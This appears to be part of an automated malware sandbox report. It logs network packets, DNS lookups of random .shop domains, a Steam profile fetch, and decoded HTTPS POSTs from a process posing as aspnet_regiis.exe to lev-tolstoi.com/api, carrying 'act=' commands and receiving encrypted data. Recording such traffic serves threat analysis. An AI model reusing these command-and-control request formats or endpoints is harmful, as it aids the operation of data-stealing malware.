Dec 18, 2024 14:47:11.300002098 CET	443	49743	172.67.157.254	192.168.2.4
Dec 18, 2024 14:47:11.300085068 CET	49743	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:47:11.300345898 CET	49743	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:47:11.300364017 CET	443	49743	172.67.157.254	192.168.2.4
Dec 18, 2024 14:47:12.091758966 CET	49744	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:47:12.091825962 CET	443	49744	172.67.157.254	192.168.2.4
Dec 18, 2024 14:47:12.091934919 CET	49744	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:47:12.096232891 CET	49744	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:47:12.096247911 CET	443	49744	172.67.157.254	192.168.2.4
Dec 18, 2024 14:47:13.323653936 CET	443	49744	172.67.157.254	192.168.2.4
Dec 18, 2024 14:47:13.323734999 CET	49744	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:47:13.325197935 CET	49744	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:47:13.325211048 CET	443	49744	172.67.157.254	192.168.2.4
Dec 18, 2024 14:47:13.325450897 CET	443	49744	172.67.157.254	192.168.2.4
Dec 18, 2024 14:47:13.327764988 CET	49744	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:47:13.328587055 CET	49744	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:47:13.328646898 CET	443	49744	172.67.157.254	192.168.2.4
Dec 18, 2024 14:47:13.329355955 CET	49744	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:47:13.329402924 CET	443	49744	172.67.157.254	192.168.2.4
Dec 18, 2024 14:47:13.329518080 CET	49744	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:47:13.329560995 CET	443	49744	172.67.157.254	192.168.2.4
Dec 18, 2024 14:47:13.330602884 CET	49744	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:47:13.330635071 CET	443	49744	172.67.157.254	192.168.2.4
Dec 18, 2024 14:47:13.330981970 CET	49744	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:47:13.331013918 CET	443	49744	172.67.157.254	192.168.2.4
Dec 18, 2024 14:47:13.331176043 CET	49744	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:47:13.331204891 CET	443	49744	172.67.157.254	192.168.2.4
Dec 18, 2024 14:47:13.331217051 CET	49744	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:47:13.331227064 CET	443	49744	172.67.157.254	192.168.2.4
Dec 18, 2024 14:47:13.331370115 CET	49744	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:47:13.331384897 CET	443	49744	172.67.157.254	192.168.2.4
Dec 18, 2024 14:47:13.331415892 CET	49744	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:47:13.331538916 CET	49744	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:47:13.331573009 CET	49744	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:47:13.379343987 CET	443	49744	172.67.157.254	192.168.2.4
Dec 18, 2024 14:47:13.379637003 CET	49744	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:47:13.379669905 CET	443	49744	172.67.157.254	192.168.2.4
Dec 18, 2024 14:47:13.379698038 CET	49744	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:47:13.379719019 CET	443	49744	172.67.157.254	192.168.2.4
Dec 18, 2024 14:47:13.379781008 CET	49744	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:47:13.379798889 CET	443	49744	172.67.157.254	192.168.2.4
Dec 18, 2024 14:47:16.066030025 CET	443	49744	172.67.157.254	192.168.2.4
Dec 18, 2024 14:47:16.066123962 CET	443	49744	172.67.157.254	192.168.2.4
Dec 18, 2024 14:47:16.066258907 CET	49744	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:47:16.066637039 CET	49744	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:47:16.066656113 CET	443	49744	172.67.157.254	192.168.2.4
Dec 18, 2024 14:47:16.086880922 CET	49745	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:47:16.086920977 CET	443	49745	172.67.157.254	192.168.2.4
Dec 18, 2024 14:47:16.087042093 CET	49745	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:47:16.087410927 CET	49745	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:47:16.087424994 CET	443	49745	172.67.157.254	192.168.2.4
Dec 18, 2024 14:47:16.248483896 CET	49745	443	192.168.2.4	172.67.157.254

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 18, 2024 14:46:36.278476954 CET	52043	53	192.168.2.4	1.1.1.1
Dec 18, 2024 14:46:36.579740047 CET	53	52043	1.1.1.1	192.168.2.4
Dec 18, 2024 14:46:36.582166910 CET	54063	53	192.168.2.4	1.1.1.1
Dec 18, 2024 14:46:36.812669039 CET	53	54063	1.1.1.1	192.168.2.4
Dec 18, 2024 14:46:36.816299915 CET	49960	53	192.168.2.4	1.1.1.1
Dec 18, 2024 14:46:37.038902044 CET	53	49960	1.1.1.1	192.168.2.4
Dec 18, 2024 14:46:37.043037891 CET	51995	53	192.168.2.4	1.1.1.1
Dec 18, 2024 14:46:37.343372107 CET	53	51995	1.1.1.1	192.168.2.4
Dec 18, 2024 14:46:37.349272013 CET	51450	53	192.168.2.4	1.1.1.1
Dec 18, 2024 14:46:37.575891972 CET	53	51450	1.1.1.1	192.168.2.4
Dec 18, 2024 14:46:37.578557014 CET	62972	53	192.168.2.4	1.1.1.1
Dec 18, 2024 14:46:37.862560034 CET	53	62972	1.1.1.1	192.168.2.4
Dec 18, 2024 14:46:37.868269920 CET	61376	53	192.168.2.4	1.1.1.1
Dec 18, 2024 14:46:38.085628033 CET	53	61376	1.1.1.1	192.168.2.4
Dec 18, 2024 14:46:38.089179039 CET	56837	53	192.168.2.4	1.1.1.1
Dec 18, 2024 14:46:38.315058947 CET	53	56837	1.1.1.1	192.168.2.4
Dec 18, 2024 14:46:38.319715977 CET	58571	53	192.168.2.4	1.1.1.1
Dec 18, 2024 14:46:38.552452087 CET	53	58571	1.1.1.1	192.168.2.4
Dec 18, 2024 14:46:38.555903912 CET	61570	53	192.168.2.4	1.1.1.1
Dec 18, 2024 14:46:38.694291115 CET	53	61570	1.1.1.1	192.168.2.4
Dec 18, 2024 14:46:41.132972002 CET	55682	53	192.168.2.4	1.1.1.1
Dec 18, 2024 14:46:41.420648098 CET	53	55682	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 18, 2024 14:46:36.278476954 CET	192.168.2.4	1.1.1.1	0x77cd	Standard query (0)	weaknessmznxo.shop	A (IP address)	IN (0x0001)	false
Dec 18, 2024 14:46:36.582166910 CET	192.168.2.4	1.1.1.1	0x3e96	Standard query (0)	potentioallykeos.shop	A (IP address)	IN (0x0001)	false
Dec 18, 2024 14:46:36.816299915 CET	192.168.2.4	1.1.1.1	0x4071	Standard query (0)	interactiedovspm.shop	A (IP address)	IN (0x0001)	false
Dec 18, 2024 14:46:37.043037891 CET	192.168.2.4	1.1.1.1	0xa772	Standard query (0)	charecteristicdxp.shop	A (IP address)	IN (0x0001)	false
Dec 18, 2024 14:46:37.349272013 CET	192.168.2.4	1.1.1.1	0x9f10	Standard query (0)	cagedwifedsozm.shop	A (IP address)	IN (0x0001)	false
Dec 18, 2024 14:46:37.578557014 CET	192.168.2.4	1.1.1.1	0xf871	Standard query (0)	deicedosmzj.shop	A (IP address)	IN (0x0001)	false
Dec 18, 2024 14:46:37.868269920 CET	192.168.2.4	1.1.1.1	0xd491	Standard query (0)	southedhiscuso.shop	A (IP address)	IN (0x0001)	false
Dec 18, 2024 14:46:38.089179039 CET	192.168.2.4	1.1.1.1	0xdd36	Standard query (0)	consciousourwi.shop	A (IP address)	IN (0x0001)	false
Dec 18, 2024 14:46:38.319715977 CET	192.168.2.4	1.1.1.1	0xae1c	Standard query (0)	weiggheticulop.shop	A (IP address)	IN (0x0001)	false
Dec 18, 2024 14:46:38.555903912 CET	192.168.2.4	1.1.1.1	0x3d10	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Dec 18, 2024 14:46:41.132972002 CET	192.168.2.4	1.1.1.1	0x9286	Standard query (0)	lev-tolstoi.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 18, 2024 14:46:36.579740047 CET	1.1.1.1	192.168.2.4	0x77cd	Name error (3)	weaknessmznxo.shop	none	none	A (IP address)	IN (0x0001)	false
Dec 18, 2024 14:46:36.812669039 CET	1.1.1.1	192.168.2.4	0x3e96	Name error (3)	potentioallykeos.shop	none	none	A (IP address)	IN (0x0001)	false
Dec 18, 2024 14:46:37.038902044 CET	1.1.1.1	192.168.2.4	0x4071	Name error (3)	interactiedovspm.shop	none	none	A (IP address)	IN (0x0001)	false
Dec 18, 2024 14:46:37.343372107 CET	1.1.1.1	192.168.2.4	0xa772	Name error (3)	charecteristicdxp.shop	none	none	A (IP address)	IN (0x0001)	false
Dec 18, 2024 14:46:37.575891972 CET	1.1.1.1	192.168.2.4	0x9f10	Name error (3)	cagedwifedsozm.shop	none	none	A (IP address)	IN (0x0001)	false
Dec 18, 2024 14:46:37.862560034 CET	1.1.1.1	192.168.2.4	0xf871	Name error (3)	deicedosmzj.shop	none	none	A (IP address)	IN (0x0001)	false
Dec 18, 2024 14:46:38.085628033 CET	1.1.1.1	192.168.2.4	0xd491	Name error (3)	southedhiscuso.shop	none	none	A (IP address)	IN (0x0001)	false
Dec 18, 2024 14:46:38.315058947 CET	1.1.1.1	192.168.2.4	0xdd36	Name error (3)	consciousourwi.shop	none	none	A (IP address)	IN (0x0001)	false
Dec 18, 2024 14:46:38.552452087 CET	1.1.1.1	192.168.2.4	0xae1c	Name error (3)	weiggheticulop.shop	none	none	A (IP address)	IN (0x0001)	false
Dec 18, 2024 14:46:38.694291115 CET	1.1.1.1	192.168.2.4	0x3d10	No error (0)	steamcommunity.com		23.55.153.106	A (IP address)	IN (0x0001)	false
Dec 18, 2024 14:46:41.420648098 CET	1.1.1.1	192.168.2.4	0x9286	No error (0)	lev-tolstoi.com		172.67.157.254	A (IP address)	IN (0x0001)	false
Dec 18, 2024 14:46:41.420648098 CET	1.1.1.1	192.168.2.4	0x9286	No error (0)	lev-tolstoi.com		104.21.66.86	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

steamcommunity.com

lev-tolstoi.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	23.55.153.106	443	7408	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 13:46:40 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2024-12-18 13:46:40 UTC	1905	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Wed, 18 Dec 2024 13:46:40 GMT Content-Length: 35121 Connection: close Set-Cookie: sessionid=77c8bb6ecdd504c2aa2c5b99; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2024-12-18 13:46:40 UTC	14479	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2024-12-18 13:46:41 UTC	10097	IN	Data Raw: 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f 52 54 09 Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
2024-12-18 13:46:41 UTC	10545	IN	Data Raw: 4e 49 56 45 52 53 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 70 75 62 6c 69 63 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4c 41 4e 47 55 41 47 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 65 6e 67 6c 69 73 68 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 55 4e 54 52 59 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 55 53 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 43 4f 4d 4d 55 4e 49 54 59 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 Data Ascii: NIVERSE":"public","LANGUAGE":"english","COUNTRY":"US","MEDIA_CDN_COMMUNITY_URL":"https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/","MEDIA_CDN_URL":"htt

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49732	172.67.157.254	443	7408	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 13:46:42 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: lev-tolstoi.com
2024-12-18 13:46:42 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-18 13:46:44 UTC	1037	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 13:46:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=p6do4oorpi04d2t45vot9tbjj6; expires=Sun, 13-Apr-2025 07:33:22 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eDlxVe2U2lDvrNfeUVxiSGiHPHfQ1nK5ZxvwvZ%2Bjn1ZqlFL4hD1s%2Fi89Tfcqj0xEMbYf987wef4532iJu09E%2F1%2Fw7aJeF552PF8tP14oCeLuNmjzkjkRlBE56bgtZxz9wYE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3f99c2bfde4273-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1760&min_rtt=1699&rtt_var=681&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=906&delivery_rate=1718658&cwnd=229&unsent_bytes=0&cid=7638af197a087862&ts=2339&x=0"
2024-12-18 13:46:44 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-18 13:46:44 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49733	172.67.157.254	443	7408	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 13:46:46 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 54 Host: lev-tolstoi.com
2024-12-18 13:46:46 UTC	54	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 75 7a 6b 6d 76 69 74 79 7a 63 71 71 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=LPnhqo--uzkmvityzcqq&j=
2024-12-18 13:46:53 UTC	1035	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 13:46:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=66cok6t5ln6p250s4b3genbcpq; expires=Sun, 13-Apr-2025 07:33:26 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F%2BDwOnfNdQxjvHW8bNUi0p6eVIogigIkNwLrJPAnlqP1bZUa5r4tFcbikLd2ykZ2nH13fuyzIR1Jkq3tqt6UjbnNDvJEw51W%2BY31LUvuZUkwVbk5VsdrroahOyqBCpGXvDY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3f99d8da06422e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2387&min_rtt=2377&rtt_var=912&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=953&delivery_rate=1186509&cwnd=252&unsent_bytes=0&cid=5b1fc0fa0738cd70&ts=7187&x=0"
2024-12-18 13:46:53 UTC	334	IN	Data Raw: 34 65 32 0d 0a 67 6d 2f 46 4d 71 44 58 62 49 78 51 74 32 36 55 4b 47 30 75 67 49 69 6e 71 4a 6e 4c 71 34 31 33 65 55 44 6c 79 4b 47 6e 76 6a 58 35 54 62 4d 51 6d 75 4e 41 72 69 50 53 54 4b 35 63 48 31 76 6c 70 49 58 4a 2f 65 6d 52 36 78 59 56 4d 34 44 6b 67 39 48 54 46 37 67 4a 70 46 37 54 73 6b 43 75 4e 63 39 4d 72 6e 4d 57 44 4f 58 6d 68 5a 4b 37 72 73 48 76 46 68 55 69 68 4b 50 4f 31 39 4a 57 36 67 4f 69 57 73 57 30 43 4f 30 38 32 67 76 78 54 51 78 45 37 75 48 4b 77 50 54 70 68 36 38 53 41 32 4c 66 36 75 7a 43 79 6c 54 50 44 72 5a 5a 67 71 70 41 39 33 4c 53 41 4c 59 53 54 30 2f 6c 36 73 76 4f 2f 61 44 44 35 52 38 64 49 34 47 69 30 63 37 59 58 65 6f 4e 6f 56 76 50 76 52 7a 67 4e 74 30 41 39 30 63 4d 44 4b 79 71 77 74 4b 37 38 59 6d 38 4a 78 67 7a 6c 72 Data Ascii: 4e2gm/FMqDXbIxQt26UKG0ugIinqJnLq413eUDlyKGnvjX5TbMQmuNAriPSTK5cH1vlpIXJ/emR6xYVM4Dkg9HTF7gJpF7TskCuNc9MrnMWDOXmhZK7rsHvFhUihKPO19JW6gOiWsW0CO082gvxTQxE7uHKwPTph68SA2Lf6uzCylTPDrZZgqpA93LSALYST0/l6svO/aDD5R8dI4Gi0c7YXeoNoVvPvRzgNt0A90cMDKyqwtK78Ym8Jxgzlr
2024-12-18 13:46:53 UTC	923	IN	Data Raw: 67 52 62 50 63 6d 7a 67 38 4c 51 46 37 68 4e 6f 56 37 44 75 41 37 38 4f 74 34 48 38 31 67 45 52 65 2f 6e 78 63 66 78 70 73 72 76 45 68 45 6f 69 4b 44 48 79 4e 46 52 34 41 33 6e 48 6f 4b 79 46 71 35 71 6c 53 2f 7a 57 67 68 41 39 4b 6a 2f 69 75 54 6e 30 4b 38 53 46 32 4c 66 36 73 76 41 33 31 54 72 41 71 52 59 79 61 63 4f 2f 44 54 59 43 65 52 4d 43 6b 4c 6f 36 64 66 41 39 61 2f 4b 35 68 34 53 4a 34 43 75 67 34 75 63 55 50 68 4e 2f 78 44 6a 75 41 58 69 4f 4d 49 4d 74 6c 56 42 56 61 4c 74 79 59 71 6a 36 63 33 75 45 52 6f 6d 69 61 54 48 79 64 70 5a 37 51 4b 68 57 73 4b 79 42 4f 59 36 31 41 48 39 52 51 39 4a 37 2b 37 44 78 76 71 73 69 61 46 56 48 44 72 48 38 6f 50 72 32 31 54 79 54 35 4a 54 7a 4c 73 4a 2b 48 4c 4b 51 75 38 4b 43 45 43 69 73 6f 58 45 2f 71 62 62 Data Ascii: gRbPcmzg8LQF7hNoV7DuA78Ot4H81gERe/nxcfxpsrvEhEoiKDHyNFR4A3nHoKyFq5qlS/zWghA9Kj/iuTn0K8SF2Lf6svA31TrAqRYyacO/DTYCeRMCkLo6dfA9a/K5h4SJ4Cug4ucUPhN/xDjuAXiOMIMtlVBVaLtyYqj6c3uERomiaTHydpZ7QKhWsKyBOY61AH9RQ9J7+7DxvqsiaFVHDrH8oPr21TyT5JTzLsJ+HLKQu8KCECisoXE/qbb
2024-12-18 13:46:53 UTC	1369	IN	Data Raw: 34 34 33 61 0d 0a 30 45 39 6b 63 4f 52 2b 72 73 79 4d 48 30 70 73 37 6e 46 68 63 6e 69 71 6d 44 69 35 78 51 2b 45 33 2f 45 4f 65 37 44 66 38 6a 6c 7a 6e 31 52 41 46 4c 39 4b 72 61 68 4f 4c 70 7a 75 4e 56 51 32 4b 4e 72 63 54 42 30 56 33 6a 43 61 4e 64 7a 62 77 48 35 79 44 66 41 50 68 59 41 6b 62 6e 35 4d 6e 50 39 4b 6e 49 37 68 73 52 4b 63 66 6b 67 38 4c 45 46 37 68 4e 69 46 33 53 70 77 54 6c 49 35 63 35 39 55 51 42 53 2f 53 71 32 6f 54 69 36 63 37 6a 56 55 4e 69 6a 4b 7a 50 79 64 78 52 38 67 4f 6f 51 73 69 6e 43 75 41 32 32 51 4c 2f 52 77 42 4a 38 4f 37 46 32 50 71 73 7a 75 45 59 43 53 66 48 35 49 50 43 78 42 65 34 54 5a 31 6b 78 61 55 66 36 58 44 67 44 2f 68 45 43 46 71 69 39 59 76 54 75 36 37 46 72 30 31 62 49 59 75 6e 79 73 44 54 52 65 6f 42 70 6b 4c Data Ascii: 443a0E9kcOR+rsyMH0ps7nFhcniqmDi5xQ+E3/EOe7Df8jlzn1RAFL9KrahOLpzuNVQ2KNrcTB0V3jCaNdzbwH5yDfAPhYAkbn5MnP9KnI7hsRKcfkg8LEF7hNiF3SpwTlI5c59UQBS/Sq2oTi6c7jVUNijKzPydxR8gOoQsinCuA22QL/RwBJ8O7F2PqszuEYCSfH5IPCxBe4TZ1kxaUf6XDgD/hECFqi9YvTu67Fr01bIYunysDTReoBpkL
2024-12-18 13:46:53 UTC	1369	IN	Data Raw: 44 62 66 43 66 4a 47 42 55 7a 6e 2b 4d 33 4d 2f 4b 58 42 36 68 6f 64 4a 34 71 74 79 4d 62 4f 52 65 4d 4a 71 56 79 43 2b 30 37 70 4b 70 56 55 74 6d 38 59 54 2f 4c 73 78 6f 72 6b 35 39 43 76 45 68 64 69 33 2b 72 44 79 39 42 63 35 77 61 73 56 4d 61 31 41 2b 55 38 32 77 58 36 51 67 4e 4c 38 4f 66 41 77 76 47 67 7a 4f 4d 59 47 44 43 45 71 34 4f 4c 6e 46 44 34 54 66 38 51 35 59 59 35 7a 58 4c 4b 51 75 38 4b 43 45 43 69 73 6f 58 4c 38 36 37 48 36 77 63 56 4d 49 6d 74 77 38 50 55 58 2b 63 42 71 56 37 51 76 51 2f 75 50 4e 6f 45 2f 30 34 4f 53 4f 62 6d 77 6f 71 31 36 63 37 33 56 55 4e 69 72 36 6e 5a 33 35 35 35 36 77 32 67 51 4e 53 75 54 76 46 38 7a 45 7a 78 52 6b 38 55 6f 75 37 4f 77 50 4b 71 77 4f 73 59 47 79 75 49 6f 38 76 49 31 45 58 68 42 37 56 55 78 37 51 42 Data Ascii: DbfCfJGBUzn+M3M/KXB6hodJ4qtyMbOReMJqVyC+07pKpVUtm8YT/Lsxork59CvEhdi3+rDy9Bc5wasVMa1A+U82wX6QgNL8OfAwvGgzOMYGDCEq4OLnFD4Tf8Q5YY5zXLKQu8KCECisoXL867H6wcVMImtw8PUX+cBqV7QvQ/uPNoE/04OSObmwoq16c73VUNir6nZ35556w2gQNSuTvF8zEzxRk8Uou7OwPKqwOsYGyuIo8vI1EXhB7VUx7QB
2024-12-18 13:46:53 UTC	1369	IN	Data Raw: 54 37 53 51 64 65 34 75 66 46 32 4f 6d 76 77 75 46 56 56 57 4b 41 73 6f 4f 64 6e 47 62 33 42 75 64 50 6a 4b 78 4f 36 54 36 56 56 4c 5a 4a 42 55 48 73 2b 4d 48 4d 38 4b 72 48 35 78 41 54 4a 6f 32 6e 7a 4d 37 57 58 75 67 4e 71 46 58 4b 76 67 6a 67 4d 39 4d 41 2b 77 70 42 44 4f 58 79 68 5a 4b 37 6a 74 50 69 45 77 77 7a 73 71 33 44 6c 4a 78 49 72 68 54 6e 56 38 37 31 56 71 34 2f 32 51 62 37 54 77 74 45 35 65 6e 45 78 76 2b 6b 78 4f 73 63 48 79 65 56 75 4d 58 4c 33 46 6a 75 41 71 74 43 7a 4c 41 4f 34 6e 4b 62 54 50 46 53 54 78 53 69 32 39 4c 4b 75 37 61 48 39 6c 55 63 4c 73 66 79 67 38 72 52 52 65 77 43 70 31 48 42 73 51 58 70 4e 4e 4d 4e 39 55 38 4d 53 65 54 72 78 63 62 78 72 73 48 6c 47 78 59 6b 67 36 7a 46 68 5a 49 58 35 78 58 6e 43 49 4b 48 41 2b 41 37 31 Data Ascii: 